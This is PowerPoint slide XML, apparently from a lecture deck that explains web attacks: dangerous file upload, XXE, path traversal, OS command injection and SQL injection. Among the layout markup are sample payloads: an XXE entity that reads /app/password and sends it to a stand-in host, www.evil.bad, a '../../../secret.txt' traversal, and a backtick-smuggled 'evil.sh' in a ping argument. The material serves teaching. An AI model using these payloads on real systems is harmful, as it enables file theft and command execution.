          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814741" y="1993850"/>
            <a:ext cx="573285" cy="729206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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54BFB6DF-C3EE-3545-BFE3-82D42039A13F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2438970" y="4797688"/>
            <a:ext cx="1947352" cy="1336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6">
                <a:lumMod val="50000"/>
                <a:alpha val="6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73E3D49-ECEB-B84F-BA98-35B0F2D4E826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149397" y="4431028"/>
            <a:ext cx="105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$$$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72BEC85-774B-3347-B2BC-7565B568A6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9000"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540358" y="1383240"/>
            <a:ext cx="1605449" cy="19504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564719A-1C4D-C042-8435-1D7D1D917F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540358" y="1068085"/>
            <a:ext cx="19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www.bank.com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2D3783DA-F065-D745-88CF-80E8E48CAF58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1962721" y="2358452"/>
            <a:ext cx="852021" cy="1964321"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
                <a:alpha val="6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0F12ECAE-B3A7-D045-9F7F-C3B59C3FA083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3674668" y="2358451"/>
            <a:ext cx="1865690" cy="3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6">
                <a:lumMod val="50000"/>
                <a:alpha val="6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15308CD-0267-C64A-9687-466A758F4132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823733" y="1959988"/>
            <a:ext cx="19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/transferMoney</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3225220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be 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1172C724-7D07-B14A-89BC-78850957D25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804246" y="1536188"/>
            <a:ext cx="1300442" cy="1924642"/>
          </a:xfrm>
          <a:prstGeom prst="cube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726" y="615090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Upload of Dangerous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2530386" y="1182176"/>
            <a:ext cx="19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www.file.server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94242" y="4316493"/>
            <a:ext cx="952500" cy="9525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143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1583179" y="4134499"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="15038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E9B8A2A-1A9D-7742-A5FF-32C355FA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3270576-9AC6-5147-9955-7029A4B4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41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020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Regular Users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4045221" y="5250094"/>
            <a:ext cx="105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650E4836-B7A8-F74B-A87F-DB491B7EBA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218530" y="2899589"/>
            <a:ext cx="875713" cy="1893155"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 126104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640274FF-491E-9140-A9EA-E5F0EA7B72D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67104" t="53205" r="16432" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218529" y="2521181"/>
            <a:ext cx="619535" cy="75681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DBFE9D-CC97-7A4D-B83A-33E68820F0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206557" y="3516135"/>
            <a:ext cx="1137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Malicious Web Script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02E84624-11C3-934C-A438-3C57C77792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 l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001343" y="1847106"/>
            <a:ext cx="510868" cy="644075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C6F4AA0E-AED1-334D-AD3A-CF28E87A322D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1547709" y="2680865"/>
            <a:ext cx="1965355" cy="941914"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="444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D149F53-C264-AA41-9725-BD5C4D468EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332955" y="2136405"/>
            <a:ext cx="151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Confidential Docs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3E17861D-E57E-7E45-AA04-7C96B7117C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="4"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779578" y="2661064"/>
            <a:ext cx="790914" cy="1655429"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2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0CCDA086-16BD-664F-8724-43B5B3A56D8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 l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376183" y="2963824"/>
            <a:ext cx="232401" cy="29299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AB325088-1CBE-1845-9F83-5B69ACCC4E1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 l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608584" y="3684801"/>
            <a:ext cx="232401" cy="292999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B2DD4FC-000F-EF40-A39A-37EBDD85726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 l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011545" y="3525022"/>
            <a:ext cx="232401" cy="29299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921835DC-FD13-8D43-B42D-06E747C428D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 l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217520" y="2794475"/>
            <a:ext cx="232401" cy="29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6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C0020F74-88C1-7A49-92E4-1BFFF00ABA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643659" y="2501704"/>
            <a:ext cx="4254567" cy="31547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tx1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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FBA5DEC-E4C6-BB41-A0C5-EE55ACA66A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805540" y="3013881"/>
            <a:ext cx="3994760" cy="2324995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="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500" y="44325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XML External Entities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4E6602-51D7-D744-84FA-B7F8376BC76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645713" y="4703914"/>
            <a:ext cx="1050542" cy="1322377"/>
            <a:chOff x="3150422" y="3824239"/>
            <a:chExt cx="1050542" cy="1322377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7DB8B7E-0945-BA4E-92AC-0C5EE259C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199443" y="3824239"/>
              <a:ext cx="952500" cy="9525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BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3150422" y="4777284"/>
              <a:ext cx="105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7DBFE9D-CC97-7A4D-B83A-33E68820F0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354238" y="2352505"/>
            <a:ext cx="162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 Processor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7E0E9B-145B-304A-99DD-4F1890294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810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811756" y="1484146"/>
            <a:ext cx="718457" cy="8728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6D0F05-8CA4-6D41-A5DF-7EEB71B7FAF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932423" y="3267838"/>
            <a:ext cx="37409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Include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/app/password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 as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&amp;xxe;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Link to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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http://www.evil.bad/DTD?pass=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&amp;xxe;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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2720C6B7-02D6-CC4E-963C-7204DDE57B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="3"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2530213" y="1917740"/>
            <a:ext cx="2454140" cy="2825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7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77780A6-765F-BC47-8367-DA53B3812228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486372" y="1460401"/>
            <a:ext cx="329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/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmttN9YC4bK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322D28A-5BB9-AA43-A6E6-CE1AF4C2FE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810" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4984353" y="1454602"/>
            <a:ext cx="718457" cy="9262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9F02034-A0C5-5F43-9C21-1A6632715CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589605" y="2412181"/>
            <a:ext cx="150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www.evil.bad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77D7AAA-998C-B84E-BA76-876A713DC084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="1178158" y="3711088"/>
            <a:ext cx="1982077" cy="3576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449E351-925A-4440-9813-8391BA3566AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005117" y="5338876"/>
            <a:ext cx="163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XML Document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="515436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FE33E449-6A50-C940-ADC5-25A3B97CA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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567765" y="2197851"/>
            <a:ext cx="349049" cy="450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3382395" y="1672003"/>
            <a:ext cx="875012" cy="1063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580" y="79003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Path Traversal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4173095" y="1807489"/>
            <a:ext cx="276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file.txt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43C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3026049" y="4256853"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="150382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E9B8A2A-1A9D-7742-A5FF-32C355FA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3270576-9AC6-5147-9955-7029A4B4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41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020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Regular Users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4CA301-D0DB-954F-8811-F42C5E388242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228580" y="4514012"/>
            <a:ext cx="1050542" cy="1270957"/>
            <a:chOff x="1228580" y="4514012"/>
            <a:chExt cx="1050542" cy="1270957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7DB8B7E-0945-BA4E-92AC-0C5EE259C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277601" y="4514012"/>
              <a:ext cx="952500" cy="9525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BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1228580" y="5415637"/>
              <a:ext cx="105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</p:grp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3C361591-A5FB-B349-BCAF-FF8BE597FD85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rot="5400000">
            <a:off x="1997137" y="2684971"/>
            <a:ext cx="1585755" cy="2072326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621EC77-1618-5043-AEE2-5DBDF80E9CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081458" y="3427124"/>
            <a:ext cx="276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../../../secret.txt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23D2E1C-5E9C-E341-8301-F960DFDDA3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25589" y="2315364"/>
            <a:ext cx="456525" cy="4565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7A6AA06-C655-4F43-9E99-C420AE5652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369652" y="2015208"/>
            <a:ext cx="913049" cy="913049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458E9429-3307-B84C-A2B5-BA0BBB18BD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658921" y="2167171"/>
            <a:ext cx="710294" cy="71029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9EE43077-F31A-BC47-BC8E-C07B195917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050602" y="2269583"/>
            <a:ext cx="584732" cy="584732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6CC8D0D6-51D9-8245-9D49-9311AC3872D7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 rot="16200000" flipH="1">
            <a:off x="3075994" y="3678439"/>
            <a:ext cx="1511926" cy="11561"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="6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1B38DB61-E807-4441-BEA6-FA5D51C04340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="0"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3039579" y="2141660"/>
            <a:ext cx="761086" cy="812109"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30036"/>
              <a:gd name="adj2" fmla="val 43758"/>
              <a:gd name="adj3" fmla="val 130036"/>
            </a:avLst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D64F8AEE-94E6-A644-AAFD-06A2904597B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="50" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2374577" y="2237974"/>
            <a:ext cx="607882" cy="671100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37606"/>
              <a:gd name="adj2" fmla="val 45322"/>
              <a:gd name="adj3" fmla="val 137606"/>
            </a:avLst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7EB8F141-975A-9445-92BC-6841FA4F3382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1778934" y="2290281"/>
            <a:ext cx="538951" cy="589116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42416"/>
              <a:gd name="adj2" fmla="val 44559"/>
              <a:gd name="adj3" fmla="val 142416"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="6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E23E0F19-51A2-CC47-B438-25CD6E1F428B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577057" y="2071942"/>
            <a:ext cx="106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secret.txt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A1E328E-278A-7442-8F3C-EA6F3A1E6EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918399" y="4128926"/>
            <a:ext cx="276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file.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1505556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8021-F5A3-7A4B-A1E4-91669ECE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608" y="211060"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS Command Injection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68B87-6FBE-DE42-A6BA-834C1B239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1123584" y="1898137"/>
            <a:ext cx="1371683" cy="166642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38FC0AF-91A6-3C40-877E-CCEF69A30155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1328982" y="4358855"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="127948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946F9A6-DF3D-E840-93F6-FB4FE5FF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77601" y="4514012"/>
              <a:ext cx="952500" cy="95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AE18CF-923F-B14E-8685-05A6FEB55251}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="105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</p:grp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A69D79DD-5599-A14B-B897-D12006D7ADBD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rot="16200000" flipV="1">
            <a:off x="1415371" y="3958618"/>
            <a:ext cx="794292" cy="6182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52B0A7-4E83-6845-AEB8-5AD5259F7D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1854253" y="3926523"/>
            <a:ext cx="1817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host: ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`evil.sh`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9CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266384" y="1582702"/>
            <a:ext cx="98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8BE125-7A9C-A340-88FE-28FD17B9536A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3655849" y="1713471"/>
            <a:ext cx="1838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Operating System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E3654963-812C-A340-828A-16DE80D8D158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95267" y="2731350"/>
            <a:ext cx="1390072" cy="2748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0CC6C9E-7DE0-134A-812B-79C33BC31255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476877" y="2398238"/>
            <a:ext cx="1408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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`evil.sh`</a:t>
            </a:r>
          </a:p>
          <a:p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6274B8A-335D-2B48-8F2A-F9464E60BD65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735854" y="1483119"/>
            <a:ext cx="1565654" cy="968623"/>
            <a:chOff x="5598337" y="1740622"/>
            <a:chExt cx="1565654" cy="968623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14D3CD47-A8BE-FE44-934A-CEC254E66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598337" y="1740622"/>
              <a:ext cx="1159824" cy="968623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32DBF5B-A6D9-514A-9C58-D12A0123CE3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5598337" y="1740622"/>
              <a:ext cx="156565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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC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E4FC0B-F6B5-0F42-9245-357BDDE31023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735854" y="2808682"/>
            <a:ext cx="1565654" cy="968623"/>
            <a:chOff x="5598337" y="1740622"/>
            <a:chExt cx="1565654" cy="968623"/>
          </a:xfrm>
        </p:grpSpPr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DA788ECB-1243-7D45-8C39-4DDBC6432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5598337" y="1740622"/>
              <a:ext cx="1159824" cy="968623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E64D24A-A263-2B47-9840-83D81685C37D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5598337" y="1740622"/>
              <a:ext cx="156565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Courier" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>&gt;_ evil.sh</a:t>
              </a:r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F087CD7-8702-7340-A1C9-392E7FCD58CE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128609" y="1967431"/>
            <a:ext cx="607245" cy="76666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23FCCC-F540-4E47-B9FD-2AF69959CCE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128609" y="2734098"/>
            <a:ext cx="607245" cy="558896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A950698-BC74-594B-8707-84540191D50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787471" y="1739791"/>
            <a:ext cx="116881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>
                <a:solidFill>
                  <a:srgbClr val="F4F4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ping: cannot resolve ABC: Unknown host</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F4F4F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5676C7C-C38B-8446-BEB1-19FE8E2A9937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847000" y="3149535"/>
            <a:ext cx="1168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F4F4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: )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F0923061-8275-6746-BBFC-83A9C2E1D3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913161" y="2152786"/>
            <a:ext cx="1157128" cy="11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34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0CC6C9E-7DE0-134A-812B-79C33BC31255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291858" y="2376861"/>
            <a:ext cx="374855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* FROM users WHERE user='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jsmith'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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E8021-F5A3-7A4B-A1E4-91669ECE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00" y="510127"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection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68B87-6FBE-DE42-A6BA-834C1B239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1123584" y="1898137"/>
            <a:ext cx="1371683" cy="166642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38FC0AF-91A6-3C40-877E-CCEF69A30155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1328982" y="4404801"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="127948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946F9A6-DF3D-E840-93F6-FB4FE5FF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77601" y="4514012"/>
              <a:ext cx="952500" cy="95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AE18CF-923F-B14E-8685-05A6FEB55251}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="105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</p:grp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A69D79DD-5599-A14B-B897-D12006D7ADBD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rot="16200000" flipV="1">
            <a:off x="1392398" y="3981591"/>
            <a:ext cx="840238" cy="6182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52B0A7-4E83-6845-AEB8-5AD5259F7D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
